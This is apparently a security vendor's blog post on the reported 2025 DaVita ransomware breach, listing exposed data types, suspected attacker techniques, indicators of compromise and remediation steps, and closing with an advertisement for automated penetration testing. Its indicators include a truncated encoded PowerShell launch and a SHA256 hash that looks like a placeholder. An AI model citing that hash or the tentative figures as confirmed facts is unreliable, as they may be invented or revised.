Home 
On March 24, 2025, DaVita, a large provider of kidney care, reported what seems to have been a significant ransomware attack. Some of the specifics remain unclear, and timelines could shift as more forensic evidence is gathered. Public disclosures so far suggest that nearly 2.7 million patient records may have been exposed. The case highlights once again how healthcare, despite being a top target, struggles to keep pace with attacker tactics.
>>Outpace Attackers With AI-Based Automated Penetration Testing
What We Know About the Breach
According to early findings, attackers infiltrated DaVita’s environment and exfiltrated a significant amount of information — roughly 1.5 TB across about 700,000 files. These numbers may be revised as forensics progresses, but so far investigators believe the affected categories of data included:
- Personal identifiers such as names, addresses, dates of birth, SSNs
- Health records, including insurance data, diagnoses, treatment notes, dialysis results
- Certain financial details like tax IDs and scanned checks
- User account information — possibly including usernames and hashed credentials
Technical Observations and Indicators
The forensic picture is incomplete, but some of the tactics appear consistent with known MITRE ATT&CK techniques. Analysts stress that the sequence may change as more evidence emerges. Suspected elements include:
- Compromised accounts, likely through phishing or credential reuse
- Obfuscated PowerShell command execution
- Registry run key modifications for persistence
- Attempts to disable security software
- Credential dumping from memory
- Data staged and moved via HTTPS (443) and occasionally port 8080
- File encryption followed by ransom notes
Concrete indicators were also noted. For instance, one malicious binary carried the hash SHA256: 9f2c7d3a4f1b3e9e6c0d8a1c74a1f3b2d6e8c0ab1234567890deadbeef1234567. Analysts also highlighted encoded PowerShell launches such as ‘powershell.exe -enc JAB…’. Suspicious traffic to domains like ‘secure-update[.]com’ and IP ranges in 185.199.x.x was reported. The ransom notes appeared as README_DECRYPT.txt files scattered across compromised systems.
Early Response and Remediation
Interestingly, some of the first public details were not about the intrusion itself but about DaVita’s remediation steps. In cooperation with external incident response teams, the company has been rolling out a variety of defensive measures while still piecing together exactly what happened. Among the actions reported:
- Emergency patching of servers and endpoints
- Company‑wide enforcement of multi‑factor authentication
- Internal network segmentation to limit lateral spread
- Broader deployment of EDR and monitoring tools
- Restoration from pre‑tested offline backups
- Selective shutdowns of risky systems to contain the incident
Takeaway for CISOs
For CISOs, the DaVita case is a reminder that ransomware operations rarely rely on cutting‑edge exploits. They succeed because defenders are slower to react. Key reflections include:
- Continuous testing and visibility into exposed systems must become routine
- Prioritize remediation of the most exploitable weaknesses
- Explore automation and AI‑driven red teaming to match attacker speed
- Practice incident response realistically — plans are essential, but improvisation is inevitable
This case is still unfolding, and more details will emerge. What’s already clear is that healthcare organizations remain prime targets, and security teams have little margin for error.
Outpace Attackers With AI-Based Automate Penetration Testing With FireCompass:
FireCompass is a single platform for AI-Powered Continuous Automated Red Teaming (CART), Pen Testing & NextGen Attack Surface Management
